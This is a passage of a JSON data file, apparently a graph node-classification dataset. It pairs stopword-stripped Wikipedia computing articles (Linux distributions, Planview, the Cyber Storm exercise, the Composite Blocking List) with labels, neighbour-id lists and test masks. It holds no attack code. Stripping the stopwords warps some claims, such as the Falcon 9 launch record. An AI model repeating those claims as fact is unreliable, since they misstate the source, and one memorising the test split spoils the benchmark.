2013 android also popular operating system tablets android smart tvs in-vehicle infotainment systems also appeared market cellphones pdas running linux open-source platforms became common 2007 examples include nokia n810 openmoko neo1973 motorola rokr e8 continuing trend palm later acquired hp produced new linux-derived operating system webos built line palm pre smartphones nokia maemo one earliest mobile operating systems based debian later merged intel moblin another linux-based operating system form meego project later terminated favor tizen operating system targeted mobile devices well ivi tizen project within linux foundation several samsung products already running tizen samsung gear 2 significant example samsung z smartphones use tizen instead android result meego termination mer project forked meego codebase create basis mobile-oriented operating systems july 2012 jolla announced sailfish os mobile operating system built upon mer technology mozilla firefox os consists linux kernel hardware abstraction layer web-standards-based runtime environment user interface integrated web browser canonical released ubuntu touch aiming bring convergence user experience mobile operating system desktop counterpart ubuntu operating system also provides full ubuntu desktop connected external monitor due low cost ease customization linux often used embedded systems non-mobile telecommunications equipment sector majority customer-premises equipment cpe hardware runs linux-based operating system openwrt community driven example upon many oem firmware releases based example popular tivo digital video recorder also uses customized linux several network firewalls routers makers cisco/linksys korg oasys korg kronos yamaha motif xs/motif xf music workstations yamaha s90xs/s70xs yamaha mox6/mox8 synthesizers yamaha motif-rack xs tone generator module roland rd-700gx digital piano also run linux linux also used stage lighting control systems wholehogiii console past games available linux recent years games released support linux especially indie games exception aaa title games android popular mobile platform uses linux kernel gained much developer interest one main platforms mobile game development along ios operating system apple iphone ipad devices february 14 2013 valve released linux version steam popular game distribution platform pc many steam games ported linux december 13 2013 valve released steamos gaming oriented os based debian beta testing plans ship steam machines gaming entertainment platform valve also developed vogl opengl debugger intended aid video game development well porting source game engine desktop linux result valve effort several prominent games dota 2 team fortress 2 portal portal 2 left 4 dead 2 natively available desktop linux july 31 2013 nvidia released shield attempt use android specialized gaming platform linux users play windows games wine crossover linux 22 august 2018 valve released fork wine called proton aimed gaming features improvements vanilla wine vulkan-based directx 11 12 implementations steam integration better full screen game controller support improved performance multi-threaded games due flexibility customizability free open-source nature linux becomes possible highly tune linux specific purpose two main methods creating specialized linux distribution building scratch general-purpose distribution base distributions often used purpose include debian fedora ubuntu based debian arch linux gentoo slackware contrast linux distributions built scratch general-purpose bases instead focus jeos philosophy including necessary components avoiding resource overhead caused components considered redundant distribution use cases home theater pc htpc pc mainly used entertainment system especially home theater system normally connected television often additional audio system openelec linux distribution incorporates media center software kodi os tuned specifically htpc built ground adhering jeos principle os lightweight suitable confined usage range htpc also special editions linux distributions include mythtv media center software mythbuntu special edition ubuntu kali linux debian-based linux distribution designed digital forensics penetration testing comes preinstalled several software applications penetration testing identifying security exploits ubuntu derivative backbox provides pre-installed security network analysis tools ethical hacking arch-based blackarch includes 2100 tools pentesting security researching many linux distributions created privacy secrecy network anonymity information security mind including tails tin hat linux tinfoil hat linux lightweight portable security distribution based arch linux developed united states department defense tor-ramdisk minimal distribution created solely host network anonymity software tor linux live cd sessions long used tool recovering data broken computer system repairing system building upon idea several linux distributions tailored purpose emerged use gparted partition editor additional data recovery system repair software spacex uses multiple redundant fault-tolerant design falcon 9 rocket merlin engine controlled three voting computers two physical processors per computer constantly check operation linux inherently fault-tolerant operating system function whole system including hardware flight computer software makes purpose flexibility commercial off-the-shelf parts system-wide radiation-tolerant design used instead radiation hardened parts spacex conducted 76 launches falcon 9 since 2010 one successfully delivered primary payloads intended orbit plans use transport astronauts international space station addition windows used operating system non-mission critical systemslaptops used board space station examplebut replaced linux first linux-powered humanoid robot also undergoing in-flight testing jet propulsion laboratory used linux number years help projects relating construction unmanned space flight deep space exploration nasa uses linux robotics mars rover ubuntu linux save data satellites linux distributions created provide hands-on experience coding source code students devices raspberry pi addition producing practical device intention show students things work hood ubuntu derivatives edubuntu linux schools project well debian derivative skolelinux provide education-oriented software packages also include tools administering building school computer labs computer-based classrooms linux terminal server project ltsp instant webkiosk webconverger browser-based linux distributions often used web kiosks digital signage thinstation minimalist distribution designed thin clients rocks cluster distribution tailored high-performance computing clusters general-purpose linux distributions target specific audience users specific language geographical area examples include ubuntu kylin chinese language users blankon targeted indonesians profession-specific distributions include ubuntu studio media creation dnalinux bioinformatics also muslim-oriented distribution name sabily consequently also provides islamic tools certain organizations use slightly specialized linux distributions internally including gendbuntu used french national gendarmerie goobuntu used internally google astra linux developed specifically russian army many quantitative studies free/open-source software focus topics including market share reliability numerous studies specifically examining linux linux market growing rapidly revenue servers desktops packaged software running linux expected exceed 35.7 billion 2008 analysts proponents attribute relative success linux security reliability low cost freedom vendor lock-in linux kernel licensed gnu general public license gpl version 2 gpl requires anyone distributes software based source code license must make originating source code modifications available recipient terms key components typical linux distribution also mainly licensed gpl may use licenses many libraries use gnu lesser general public license lgpl permissive variant gpl x.org implementation x window system uses mit license torvalds states linux kernel move version 2 gpl version 3 specifically dislikes provisions new license prohibit use software digital rights management would also impractical obtain permission copyright holders number thousands 2001 study red hat linux 7.1 found distribution contained 30 million source lines code using constructive cost model study estimated distribution required eight thousand person-years development time according study software developed conventional proprietary means would cost us dollars develop united states source code 71 written c programming language many languages used including c++ lisp assembly language perl python fortran various shell scripting languages slightly half lines code licensed gpl linux kernel 2.4 million lines code 8 total later study analysis performed debian version 4.0 etch released 2007 distribution contained close 283 million source lines code study estimated would required seventy three thousand man-years cost us dollars develop conventional means united states name linux trademark registered linus torvalds initially nobody registered august 15 1994 william r. della croce jr. filed trademark linux demanded royalties linux distributors 1996 torvalds affected organizations sued trademark assigned torvalds 1997 case settled licensing trademark since handled linux mark institute lmi torvalds stated trademarked name prevent someone else using lmi originally charged nominal sublicensing fee use linux name part trademarks later changed favor offering free perpetual worldwide sublicense free software foundation fsf prefers gnu/linux name referring operating system whole considers linux distributions variants gnu operating system initiated 1983 richard stallman president fsf explicitly take issue name android android os also operating system based linux kernel gnu part minority public figures software projects stallman fsf notably debian sponsored fsf 1996 also use gnu/linux referring operating system whole media common usage however refers family operating systems simply linux many large linux distributions example suse linux red hat enterprise linux contrast linux distributions containing free software use gnu/linux simply gnu trisquel gnu/linux parabola gnu/linux-libre blag linux gnu gnewsense 8 13 modern linux distribution made gnu components range depending whether gnome considered part gnu determined counting lines source code making ubuntu natty release meanwhile 6 taken linux kernel increased 9 including direct dependencies",
    "neighbors": [
      8195,
      8197,
      9,
      15,
      18,
      19,
      8213,
      8214,
      25,
      28,
      8225,
      8227,
      8228,
      38,
      8235,
      44,
      8242,
      8243,
      56,
      8248,
      59,
      8254,
      8256,
      8260,
      69,
      8262,
      8263,
      76,
      8268,
      85,
      89,
      97,
      8294,
      8295,
      8298,
      8303,
      8304,
      8306,
      118,
      8312,
      125,
      8319,
      131,
      132,
      8326,
      8333,
      142,
      143,
      8340,
      8345,
      8350,
      161,
      162,
      8354,
      165,
      8360,
      8364,
      8369,
      178,
      186,
      8378,
      190,
      8388,
      198,
      201,
      206,
      8399,
      8404,
      8410,
      225,
      226,
      8418,
      8419,
      231,
      8424,
      233,
      8428,
      8432,
      8433,
      242,
      246,
      8438,
      249,
      251,
      8443,
      8445,
      8455,
      273,
      274,
      8465,
      8466,
      8469,
      278,
      282,
      283,
      8476,
      287,
      291,
      292,
      295,
      297,
      303,
      8497,
      8502,
      8504,
      8505,
      318,
      8513,
      8516,
      8517,
      8520,
      330,
      332,
      8524,
      8526,
      8528,
      346,
      8539,
      349,
      356,
      359,
      8551,
      362,
      8554,
      8556,
      8559,
      376,
      8569,
      379,
      8573,
      8582,
      8584,
      394,
      8594,
      8595,
      405,
      8597,
      8602,
      411,
      414,
      421,
      426,
      428,
      8621,
      8622,
      8627,
      8630,
      439,
      8631,
      451,
      8643,
      8644,
      455,
      457,
      8651,
      461,
      463,
      468,
      8661,
      470,
      477,
      8675,
      8676,
      485,
      487,
      491,
      492,
      8683,
      494,
      8685,
      8687,
      8690,
      499,
      8700,
      515,
      516,
      518,
      8718,
      8721,
      8725,
      8727,
      8728,
      543,
      8737,
      546,
      550,
      551,
      561,
      562,
      8753,
      569,
      8764,
      576,
      8770,
      8771,
      580,
      8772,
      8774,
      585,
      8778,
      587,
      589,
      593,
      8787,
      596,
      597,
      8799,
      8810,
      8816,
      633,
      634,
      637,
      640,
      8832,
      642,
      8837,
      8848,
      657,
      8852,
      661,
      8856,
      8857,
      667,
      671,
      8863,
      673,
      8867,
      677,
      8871,
      682,
      684,
      686,
      8879,
      8880,
      692,
      8886,
      697,
      8889,
      699,
      700,
      704,
      8899,
      8901,
      8906,
      8907,
      8909,
      718,
      8913,
      722,
      724,
      8922,
      8928,
      8932,
      741,
      8937,
      8938,
      749,
      8943,
      752,
      753,
      8944,
      8957,
      8963,
      8965,
      8969,
      780,
      8977,
      786,
      787,
      788,
      789,
      791,
      799,
      8991,
      8992,
      802,
      8994,
      804,
      8995,
      8998,
      9004,
      815,
      9009,
      9022,
      831,
      833,
      9027,
      842,
      843,
      9034,
      847,
      9045,
      9051,
      862,
      863,
      9054,
      865,
      868,
      9063,
      9064,
      875,
      878,
      9070,
      9074,
      9076,
      9080,
      894,
      900,
      905,
      9097,
      908,
      912,
      9106,
      915,
      9109,
      9112,
      926,
      9119,
      929,
      932,
      9125,
      934,
      935,
      941,
      9133,
      9135,
      944,
      9138,
      9141,
      9142,
      9146,
      9148,
      9151,
      9153,
      974,
      975,
      9166,
      981,
      9177,
      989,
      9190,
      9192,
      9197,
      9198,
      9204,
      9205,
      1026,
      9223,
      1032,
      1033,
      9237,
      9245,
      9253,
      1064,
      1065,
      9257,
      9266,
      1081,
      9273,
      1083,
      9276,
      9277,
      9279,
      9280,
      1089,
      1101,
      1106,
      1107,
      9298,
      1109,
      1110,
      1112,
      1115,
      9309,
      1121,
      9318,
      9320,
      9322,
      1132,
      9324,
      1134,
      1137,
      1138,
      9332,
      9333,
      1143,
      9335,
      1145,
      9337,
      1147,
      1150,
      1151,
      1152,
      9342,
      9343,
      9353,
      1164,
      1165,
      9356,
      9358,
      9360,
      1172,
      9366,
      1177,
      1178,
      9370,
      9371,
      1185,
      1190,
      1193,
      9389,
      1200,
      1203,
      1207,
      1211,
      9420,
      9422,
      9423,
      1234,
      9431,
      1242,
      9434,
      9436,
      9438,
      1247,
      9442,
      1251,
      9444,
      1253,
      1255,
      1257,
      9455,
      9461,
      1270,
      1273,
      9466,
      9468,
      1277,
      1278,
      1282,
      1291,
      9484,
      1293,
      1294,
      9487,
      1298,
      1304,
      1305,
      9496,
      1309,
      1310,
      9501,
      9507,
      9509,
      9525,
      1340,
      9533,
      9538,
      1347,
      1348,
      9540,
      9542,
      9544,
      1358,
      9557,
      9562,
      9564,
      9567,
      1377,
      1379,
      9571,
      1384,
      9578,
      9579,
      9581,
      1390,
      9585,
      1394,
      1396,
      1399,
      1400,
      9597,
      1406,
      1410,
      1411,
      1422,
      9616,
      1429,
      1431,
      1435,
      1436,
      1443,
      1444,
      1445,
      9635,
      9637,
      1448,
      1449,
      1450,
      9640,
      9643,
      9644,
      1454,
      1455,
      1456,
      9646,
      9647,
      9650,
      1462,
      9655,
      1467,
      9660,
      9665,
      9667,
      9671,
      1480,
      9687,
      9688,
      9693,
      1503,
      1504,
      9696,
      1506,
      9699,
      1508,
      1509,
      1510,
      9706,
      1515,
      1517,
      1520,
      1522,
      1524,
      1530,
      1531,
      9722,
      9723,
      9727,
      9732,
      1542,
      9735,
      9736,
      9740,
      1549,
      9742,
      9746,
      1560,
      1561,
      9757,
      9760,
      9762,
      9766,
      1575,
      1580,
      1584,
      9778,
      9780,
      1591,
      9783,
      9784,
      9787,
      9791,
      9798,
      1608,
      9807,
      1617,
      1618,
      9810,
      1624,
      9816,
      9817,
      1632,
      9824,
      1634,
      9827,
      1636,
      9835,
      9836,
      9839,
      1648,
      9842,
      9843,
      9844,
      1655,
      9851,
      1664,
      1668,
      9865,
      1674,
      9872,
      1682,
      9880,
      9882,
      1694,
      9887,
      1700,
      9892,
      1702,
      1708,
      9902,
      9907,
      9908,
      1717,
      9915,
      1728,
      9920,
      9921,
      1731,
      9925,
      9927,
      1736,
      9930,
      9932,
      1741,
      9939,
      1754,
      9946,
      9948,
      1757,
      1761,
      9953,
      9957,
      9964,
      1775,
      1776,
      9970,
      9971,
      9973,
      9978,
      9979,
      1789,
      9981,
      9983,
      1792,
      1801,
      1804,
      9996,
      9997,
      1810,
      1811,
      1813,
      1817,
      10012,
      1822,
      10016,
      10022,
      1833,
      10025,
      1837,
      1839,
      10032,
      10033,
      1842,
      1844,
      1849,
      10041,
      1858,
      1859,
      1860,
      10051,
      10055,
      1869,
      10063,
      1880,
      1881,
      10076,
      10079,
      10083,
      10087,
      10088,
      10089,
      10091,
      1901,
      10096,
      10101,
      1911,
      1912,
      10108,
      1917,
      10109,
      10113,
      1924,
      1926,
      1932,
      1933,
      1935,
      10127,
      1937,
      10130,
      1939,
      1943,
      10135,
      10142,
      1952,
      10149,
      10151,
      10153,
      10154,
      10155,
      10156,
      1965,
      10159,
      10161,
      1970,
      1971,
      1972,
      10169,
      1978,
      10172,
      10176,
      1987,
      10187,
      1996,
      10192,
      2001,
      2002,
      2003,
      10195,
      2005,
      2008,
      2010,
      10202,
      2018,
      2021,
      10215,
      10223,
      2035,
      2036,
      10235,
      2044,
      2045,
      10236,
      2049,
      2050,
      2051,
      2058,
      2062,
      10254,
      2064,
      10255,
      10258,
      2079,
      2081,
      10276,
      10284,
      10288,
      2098,
      2105,
      2109,
      2111,
      10308,
      2118,
      2120,
      10316,
      10317,
      2132,
      2134,
      2135,
      10327,
      2137,
      2138,
      2139,
      10333,
      2143,
      10340,
      10341,
      10346,
      2165,
      10359,
      2168,
      2178,
      2179,
      2180,
      10370,
      10374,
      10376,
      10382,
      2193,
      2194,
      2195,
      10387,
      2197,
      10389,
      2199,
      2201,
      10394,
      2205,
      10397,
      2211,
      2212,
      2213,
      10405,
      10407,
      2224,
      2225,
      10417,
      2227,
      2228,
      2230,
      10422,
      2233,
      2235,
      2236,
      2239,
      10433,
      2244,
      10436,
      2248,
      2250,
      2252,
      2253,
      10446,
      10447,
      2259,
      10451,
      2267,
      10459,
      10464,
      2278,
      10470,
      10472,
      10476,
      2285,
      2287,
      10480,
      10482,
      2292,
      10484,
      10486,
      2301,
      10499,
      2310,
      10503,
      2317,
      2321,
      2322,
      10525,
      2335,
      10528,
      2338,
      10530,
      10531,
      2345,
      2355,
      10550,
      2361,
      2364,
      2368,
      2370,
      10564,
      10565,
      2375,
      2378,
      2379,
      2382,
      2383,
      10583,
      2392,
      2394,
      2395,
      2397,
      10590,
      2401,
      10595,
      2406,
      2409,
      10601,
      2413,
      10606,
      2417,
      2424,
      2430,
      10622,
      10623,
      2447,
      2448,
      10642,
      10643,
      2457,
      10649,
      10653,
      2462,
      10655,
      10658,
      2467,
      10676,
      10678,
      2487,
      2490,
      2494,
      10687,
      10694,
      2509,
      10708,
      2517,
      2519,
      2520,
      10712,
      10722,
      10725,
      2536,
      10730,
      10731,
      10732,
      2545,
      2548,
      2550,
      10747,
      2558,
      2559,
      2560,
      10752,
      2563,
      10760,
      10763,
      10764,
      2579,
      2581,
      10774,
      10776,
      10780,
      10785,
      10790,
      10791,
      2601,
      10797,
      10803,
      2612,
      10809,
      10811,
      10813,
      2625,
      10817,
      10822,
      10831,
      2645,
      10839,
      2651,
      2652,
      2654,
      2656,
      2658,
      10851,
      10852,
      10856,
      10857,
      2666,
      2667,
      10860,
      2670,
      2671,
      10863,
      10874,
      10883,
      2693,
      2694,
      10891,
      2702,
      10897,
      10900,
      2710,
      2711,
      10908,
      10910,
      2721,
      2723,
      2727,
      2730,
      10924,
      10926,
      2738,
      2739,
      2741,
      10933,
      10950,
      2761,
      2762,
      2769,
      10965,
      10967,
      10971,
      10977,
      2786,
      10982,
      10987,
      2804,
      2809,
      2810,
      2811,
      11004,
      11006,
      11012,
      11013,
      2825,
      2826,
      11017,
      11023,
      11026,
      2836,
      11030,
      2839,
      2853,
      2864,
      11057,
      2870,
      11063,
      2872,
      11065,
      11069,
      11072,
      11073,
      11074,
      11075,
      2884,
      11079,
      11093,
      2903,
      11095,
      2905,
      11096,
      2907,
      2908,
      2910,
      2914,
      2916,
      11111,
      11112,
      2922,
      2933,
      2934,
      2935,
      2940,
      2944,
      2948,
      2949,
      11140,
      11145,
      2955,
      11153,
      11155,
      2966,
      2970,
      2974,
      11174,
      2987,
      11179,
      2990,
      11184,
      2995,
      11188,
      11191,
      3006,
      3007,
      11198,
      11200,
      11203,
      11204,
      11205,
      3015,
      11207,
      3023,
      11218,
      11221,
      3033,
      3034,
      11227,
      11228,
      11232,
      3042,
      11235,
      11237,
      11239,
      3048,
      3053,
      11245,
      3055,
      11246,
      11248,
      11249,
      11251,
      3062,
      11263,
      3073,
      3074,
      11269,
      11271,
      3082,
      3083,
      11276,
      11287,
      3096,
      3097,
      11292,
      3101,
      11293,
      11305,
      3114,
      11306,
      11320,
      11322,
      3131,
      11323,
      11325,
      3134,
      3137,
      3142,
      11337,
      3159,
      3160,
      11353,
      3162,
      11357,
      11363,
      11368,
      3183,
      3189,
      11382,
      11385,
      11388,
      3197,
      11390,
      11391,
      11392,
      11394,
      3204,
      11396,
      3206,
      3210,
      3214,
      11406,
      11412,
      3222,
      11418,
      11423,
      11424,
      11426,
      11428,
      3237,
      11431,
      3241,
      11434,
      3243,
      11436,
      3248,
      11440,
      11442,
      11446,
      11447,
      11454,
      3272,
      11468,
      11475,
      3284,
      3289,
      3292,
      11485,
      3294,
      11488,
      11489,
      3299,
      3300,
      11492,
      3304,
      11501,
      3312,
      3314,
      11506,
      3321,
      3323,
      3326,
      3328,
      11525,
      3334,
      11530,
      3340,
      11535,
      11539,
      3349,
      3350,
      3360,
      11552,
      3362,
      11553,
      11559,
      3369,
      11562,
      11566,
      3382,
      3387,
      11581,
      3395,
      11587,
      3399,
      3400,
      3401,
      11595,
      11596,
      11601,
      11602,
      11603,
      3412,
      3413,
      3414,
      11604,
      11605,
      11606,
      11607,
      11608,
      3420,
      11613,
      3422,
      3426,
      11623,
      3439,
      11632,
      3442,
      11634,
      11635,
      3449,
      11641,
      11643,
      11644,
      3458,
      11651,
      11654,
      3466,
      3467,
      11661,
      11664,
      3473,
      11667,
      3478,
      3482,
      11675,
      11678,
      3487,
      3488,
      11680,
      11688,
      3499,
      3514,
      3522,
      3548,
      3550,
      3565,
      3567,
      3577,
      3578,
      3581,
      3582,
      3583,
      3590,
      3603,
      3604,
      3609,
      3615,
      3618,
      3625,
      3628,
      3631,
      3634,
      3647,
      3649,
      3652,
      3659,
      3665,
      3667,
      3675,
      3676,
      3685,
      3727,
      3734,
      3744,
      3745,
      3753,
      3757,
      3777,
      3790,
      3791,
      3793,
      3794,
      3797,
      3799,
      3800,
      3801,
      3802,
      3804,
      3807,
      3815,
      3827,
      3828,
      3834,
      3841,
      3857,
      3859,
      3876,
      3885,
      3886,
      3903,
      3904,
      3911,
      3918,
      3931,
      3937,
      3938,
      3939,
      3940,
      3942,
      3944,
      3945,
      3950,
      3956,
      3960,
      3966,
      3969,
      3971,
      3974,
      3975,
      3976,
      3978,
      3980,
      3984,
      3994,
      4009,
      4011,
      4020,
      4029,
      4032,
      4033,
      4039,
      4040,
      4056,
      4060,
      4061,
      4073,
      4075,
      4076,
      4085,
      4089,
      4106,
      4145,
      4147,
      4151,
      4154,
      4161,
      4171,
      4177,
      4194,
      4200,
      4207,
      4219,
      4225,
      4235,
      4238,
      4255,
      4268,
      4282,
      4296,
      4298,
      4302,
      4306,
      4309,
      4316,
      4326,
      4333,
      4347,
      4349,
      4360,
      4367,
      4369,
      4379,
      4383,
      4390,
      4398,
      4402,
      4408,
      4409,
      4421,
      4423,
      4431,
      4432,
      4433,
      4435,
      4437,
      4438,
      4441,
      4454,
      4457,
      4464,
      4473,
      4479,
      4480,
      4485,
      4492,
      4493,
      4499,
      4501,
      4511,
      4512,
      4514,
      4519,
      4521,
      4522,
      4525,
      4526,
      4536,
      4550,
      4564,
      4568,
      4580,
      4604,
      4616,
      4622,
      4623,
      4628,
      4630,
      4634,
      4637,
      4641,
      4643,
      4656,
      4661,
      4673,
      4684,
      4695,
      4699,
      4708,
      4727,
      4728,
      4729,
      4743,
      4758,
      4764,
      4772,
      4775,
      4789,
      4790,
      4801,
      4803,
      4808,
      4814,
      4815,
      4831,
      4840,
      4841,
      4853,
      4857,
      4862,
      4871,
      4878,
      4887,
      4889,
      4902,
      4925,
      4926,
      4927,
      4934,
      4943,
      4953,
      4961,
      4982,
      4989,
      4994,
      5000,
      5006,
      5013,
      5019,
      5022,
      5023,
      5024,
      5026,
      5031,
      5036,
      5037,
      5045,
      5048,
      5049,
      5054,
      5057,
      5063,
      5065,
      5067,
      5069,
      5070,
      5073,
      5076,
      5077,
      5078,
      5080,
      5086,
      5088,
      5096,
      5105,
      5106,
      5110,
      5114,
      5115,
      5129,
      5139,
      5158,
      5165,
      5167,
      5170,
      5176,
      5178,
      5179,
      5190,
      5196,
      5206,
      5209,
      5214,
      5215,
      5222,
      5230,
      5231,
      5232,
      5244,
      5247,
      5250,
      5251,
      5256,
      5264,
      5279,
      5284,
      5286,
      5292,
      5293,
      5312,
      5313,
      5314,
      5315,
      5318,
      5339,
      5346,
      5347,
      5348,
      5356,
      5363,
      5378,
      5381,
      5384,
      5390,
      5391,
      5397,
      5406,
      5407,
      5410,
      5413,
      5430,
      5432,
      5435,
      5450,
      5451,
      5452,
      5454,
      5457,
      5462,
      5484,
      5489,
      5492,
      5498,
      5500,
      5504,
      5506,
      5514,
      5523,
      5526,
      5534,
      5536,
      5549,
      5569,
      5584,
      5593,
      5596,
      5597,
      5612,
      5619,
      5620,
      5636,
      5637,
      5640,
      5644,
      5650,
      5663,
      5670,
      5677,
      5679,
      5681,
      5685,
      5688,
      5697,
      5702,
      5703,
      5705,
      5706,
      5707,
      5723,
      5738,
      5741,
      5746,
      5747,
      5755,
      5768,
      5784,
      5785,
      5797,
      5800,
      5805,
      5807,
      5813,
      5819,
      5822,
      5823,
      5824,
      5830,
      5831,
      5840,
      5847,
      5860,
      5864,
      5869,
      5873,
      5874,
      5909,
      5914,
      5920,
      5922,
      5924,
      5927,
      5931,
      5945,
      5952,
      5964,
      5969,
      5970,
      5974,
      5975,
      5981,
      5988,
      5990,
      6004,
      6015,
      6016,
      6018,
      6020,
      6021,
      6022,
      6033,
      6037,
      6041,
      6049,
      6055,
      6057,
      6058,
      6063,
      6075,
      6078,
      6086,
      6087,
      6092,
      6112,
      6118,
      6119,
      6128,
      6129,
      6133,
      6135,
      6144,
      6150,
      6153,
      6154,
      6155,
      6157,
      6158,
      6166,
      6167,
      6172,
      6177,
      6179,
      6180,
      6188,
      6189,
      6198,
      6203,
      6204,
      6207,
      6218,
      6221,
      6227,
      6228,
      6231,
      6238,
      6242,
      6243,
      6244,
      6245,
      6263,
      6278,
      6281,
      6285,
      6291,
      6293,
      6295,
      6296,
      6297,
      6301,
      6302,
      6307,
      6311,
      6315,
      6322,
      6329,
      6333,
      6338,
      6340,
      6345,
      6347,
      6351,
      6352,
      6356,
      6361,
      6364,
      6365,
      6369,
      6371,
      6379,
      6380,
      6393,
      6398,
      6412,
      6413,
      6416,
      6431,
      6434,
      6436,
      6438,
      6443,
      6445,
      6446,
      6450,
      6451,
      6459,
      6468,
      6470,
      6479,
      6480,
      6483,
      6489,
      6493,
      6501,
      6502,
      6508,
      6513,
      6521,
      6523,
      6529,
      6532,
      6534,
      6539,
      6540,
      6543,
      6550,
      6559,
      6560,
      6570,
      6576,
      6579,
      6591,
      6597,
      6601,
      6602,
      6606,
      6607,
      6615,
      6616,
      6618,
      6620,
      6622,
      6624,
      6625,
      6626,
      6634,
      6643,
      6657,
      6669,
      6671,
      6675,
      6677,
      6680,
      6691,
      6694,
      6701,
      6713,
      6717,
      6718,
      6730,
      6735,
      6743,
      6747,
      6758,
      6760,
      6763,
      6768,
      6772,
      6774,
      6780,
      6787,
      6797,
      6800,
      6802,
      6808,
      6813,
      6828,
      6831,
      6837,
      6838,
      6839,
      6845,
      6852,
      6854,
      6879,
      6888,
      6890,
      6898,
      6904,
      6908,
      6909,
      6910,
      6915,
      6925,
      6933,
      6947,
      6966,
      6968,
      6969,
      6979,
      6986,
      6988,
      6993,
      6997,
      6998,
      6999,
      7005,
      7017,
      7020,
      7022,
      7039,
      7049,
      7057,
      7067,
      7070,
      7076,
      7077,
      7078,
      7087,
      7095,
      7097,
      7104,
      7112,
      7121,
      7128,
      7134,
      7135,
      7136,
      7139,
      7140,
      7141,
      7152,
      7155,
      7170,
      7172,
      7181,
      7187,
      7188,
      7189,
      7192,
      7196,
      7204,
      7206,
      7217,
      7223,
      7224,
      7228,
      7234,
      7235,
      7238,
      7241,
      7244,
      7252,
      7254,
      7255,
      7285,
      7287,
      7292,
      7293,
      7301,
      7308,
      7309,
      7323,
      7325,
      7326,
      7329,
      7340,
      7341,
      7342,
      7344,
      7355,
      7356,
      7357,
      7361,
      7364,
      7372,
      7376,
      7379,
      7382,
      7384,
      7392,
      7398,
      7403,
      7432,
      7435,
      7439,
      7444,
      7450,
      7451,
      7459,
      7460,
      7470,
      7471,
      7472,
      7477,
      7483,
      7486,
      7495,
      7497,
      7502,
      7507,
      7509,
      7511,
      7516,
      7519,
      7526,
      7529,
      7534,
      7535,
      7540,
      7554,
      7555,
      7558,
      7565,
      7566,
      7570,
      7571,
      7584,
      7588,
      7593,
      7601,
      7603,
      7608,
      7618,
      7642,
      7645,
      7648,
      7656,
      7663,
      7664,
      7672,
      7682,
      7685,
      7689,
      7696,
      7702,
      7722,
      7728,
      7739,
      7746,
      7749,
      7755,
      7769,
      7771,
      7774,
      7789,
      7793,
      7807,
      7810,
      7812,
      7813,
      7817,
      7818,
      7822,
      7845,
      7847,
      7848,
      7850,
      7854,
      7857,
      7859,
      7860,
      7861,
      7863,
      7872,
      7885,
      7889,
      7904,
      7905,
      7912,
      7913,
      7914,
      7919,
      7920,
      7930,
      7934,
      7938,
      7941,
      7943,
      7945,
      7947,
      7954,
      7957,
      7970,
      7975,
      7983,
      7999,
      8005,
      8007,
      8011,
      8012,
      8020,
      8021,
      8036,
      8039,
      8046,
      8063,
      8065,
      8067,
      8069,
      8071,
      8076,
      8079,
      8082,
      8092,
      8097,
      8112,
      8114,
      8115,
      8121,
      8122,
      8124,
      8136,
      8139,
      8144,
      8146,
      8147,
      8157,
      8169,
      8177,
      8178,
      8180,
      8186
    ],
    "mask": "Test"
  },
  {
    "node_id": 824,
    "label": 7,
    "text": "Planview:planview planview global enterprise software company headquartered austin texas company founded 1989 austin texas patrick durbin 1997 company launched complete web-based resource project portfolio management ppm software planview enterprise version 14 2017 2010 company moved cloud offer software service saas solutions december 2013 insight venture partners acquired substantial interest planview august 2014 planview acquired projectplace stockholm-based project collaboration company planview went acquire troux technologies austin-based enterprise architecture management software company may 2015 august 1 2016 company announced acquisition san francisco-based innotas thus extending project portfolio management software leadership mid-market january 2017 thoma bravo acquired planview becoming majority shareholder insight venture partners maintained original 2014 capital investment company december 2017 planview acquired leankit december 2018 planview acquired spigit planview recognized visionary magic quadrant enterprise architecture tools gartner magic quadrant enterprise architecture tools – may 24 2017 gartner names planview leader project portfolio management ppm gartner 2017 magic quadrant project portfolio management worldwide may 25 2017 planview cited leader troux forrester wave™ enterprise architecture management suites q2 2017 – june 14 2017 forrester research identifies projectplace leader rapidly growing work collaboration market forrester wave™ enterprise collaborative work management q4 2016 ventana research awards 2016 cio/it leadership award mentor graphics using planview enterprise projectplace ensure resources working initiatives highest strategic value constellation research names projectplace 2016 constellation shortlist™ social task management",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 825,
    "label": 9,
    "text": "Christophe_de_Dinechin:christophe de dinechin christophe de dinechin french computer scientist contributions video games programming languages operating systems designer xl programming language associated concept programming methodology de dinechin also contributed c++ notably high-performance exception handling implementation became de facto standard industry de dinechin one proponents portable c++ abi initially developed itanium widely used across platforms initial developer alpha waves groundbreaking atari st game probably first 3d platform game de dinechin heavily influenced frederick raynal main developer alone dark de dinechin also wrote viral games hp-48 calculators first person take advantage hardware-scrolling machines early 2000s worked software architect hp-ux initial designer hp virtualisation platform itanium servers hp integrity virtual machines awarded 10 us patents work christophe de dinechin initial port emacs aqua user interface wrote variety open-source drivers hp de200c digital entertainment center turning web-connected cd player true digital video recorder christophe de dinechin currently ceo taodyne company develops 3d animation tool using xl programming language describe dynamic documents",
    "neighbors": [
      9921,
      8262,
      7983,
      5523,
      1304
    ],
    "mask": "None"
  },
  {
    "node_id": 826,
    "label": 4,
    "text": "Cyber_Storm_Exercise:cyber storm exercise cyber storm exercise simulated exercise overseen department homeland security took place february 6 february 10 2006 purpose testing nation defenses digital espionage simulation targeted primarily american security organizations officials united kingdom canada australia new zealand participated well exercise simulated large scale attack critical digital infrastructure communications transportation energy production simulation took place series incidents included exercise computers running simulation came attack players heavily censored files released associated press reveal time exercise organizers sent every one involved e-mail marked important telling participants simulation attack game control computers cyber storm exercise highlighted gaps shortcomings nation cyber defenses cyber storm exercise report found institutions attack hard time getting bigger picture instead focused single incidents treating individual discrete light test department homeland security raised concern relatively modest resources assigned cyber-defense would overwhelmed real attack",
    "neighbors": [
      10249,
      4956,
      9398
    ],
    "mask": "Test"
  },
  {
    "node_id": 827,
    "label": 4,
    "text": "Composite_Blocking_List:composite blocking list computer networking composite blocking list cbl dns-based blackhole list suspected e-mail spam sending computer infections cbl takes source data large spamtraps/mail infrastructures lists ips exhibiting characteristics cbl attempts avoid listing real mail servers certain misconfigurations mail servers make system appear infected example servers send helo 'localhost similar incorrect domain entries automatically expire period time cbl provide public access gathered evidence cbl data used spamhaus xbl list",
    "neighbors": [
      8224,
      10756,
      4295,
      4883,
      5591,
      2041,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 828,
    "label": 1,
